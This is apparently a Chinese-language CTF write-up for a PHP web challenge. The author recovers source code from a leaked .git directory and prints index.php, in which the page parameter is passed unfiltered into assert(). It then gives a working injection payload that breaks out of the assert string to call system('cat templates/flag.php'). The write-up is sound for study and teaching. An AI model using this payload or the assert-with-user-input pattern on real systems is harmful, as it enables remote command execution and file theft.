打开题目一通乱点,在about界面看到了一些内容

    1. I wrote this website all by myself in under a week!
    2. I used:
    3.     Git
    4.     PHP
    5.     Bootstrap

    看到有git,猜测是git文件泄露。
    使用Git_Extract,下载下来源码,得到四个文件

    1. index.php about.php  contact.php  flag.php  home.php

    首先查看flag.php的内容

    1. <?php
    2. // TODO
    3. // $FLAG = '';
    4. ?>

    但是flag变量里面什么都没有,接下来查看index.php的内容

    1. <?php
    3. if (isset($_GET['page'])) {
    4.         $page = $_GET['page'];
    5. } else {
    6.         $page = "home";
    7. }
    9. $file = "templates/" . $page . ".php";
    11. // I heard '..' is dangerous!
    12. assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
    14. // TODO: Make this look nice
    15. assert("file_exists('$file')") or die("That file doesn't exist!");
    17. ?>
    18. <!DOCTYPE html>
    19. <html>
    20.         <head>
    21.                 <meta charset="utf-8">
    22.                 <meta http-equiv="X-UA-Compatible" content="IE=edge">
    23.                 <meta name="viewport" content="width=device-width, initial-scale=1">
    25.                 <title>My PHP Website</title>
    27.                 <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
    28.         </head>
    29.         <body>
    30.                 <nav class="navbar navbar-inverse navbar-fixed-top">
    31.                         <div class="container">
    32.                         <div class="navbar-header">
    33.                                 <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
    34.                                 <span class="sr-only">Toggle navigation</span>
    35.                                 <span class="icon-bar"></span>
    36.                                 <span class="icon-bar"></span>
    37.                                 <span class="icon-bar"></span>
    38.                                 </button>
    39.                                 <a class="navbar-brand" href="#">Project name</a>
    40.                         </div>
    41.                         <div id="navbar" class="collapse navbar-collapse">
    42.                                 <ul class="nav navbar-nav">
    43.                                 <li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
    44.                                 <li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
    45.                                 <li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
    46.                                                 <!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
    47.                                 </ul>
    48.                         </div>
    49.                     </div>
    50.                 </nav>
    52.                 <div class="container" style="margin-top: 50px">
    53.                         <?php
    54.                                 require_once $file;
    55.                         ?>
    57.                 </div>
    59.                 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
    60.                 <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
    61.         </body>
    62. </html>

    可以看到代码对page变量没有任何过滤,并且下面有个assert函数,构造payload:

    1. flag') or system('cat templates/flag.php');//

    与assert结合之后:

    1. assert("strpos('flag') or system('cat templates/flag.php');//', '..') === false") or die("Detected hacking attempt!");

    中间的or不能替换为;或and,否则assert执行的结果会是false。后面的//注释掉', '..') === false的内容。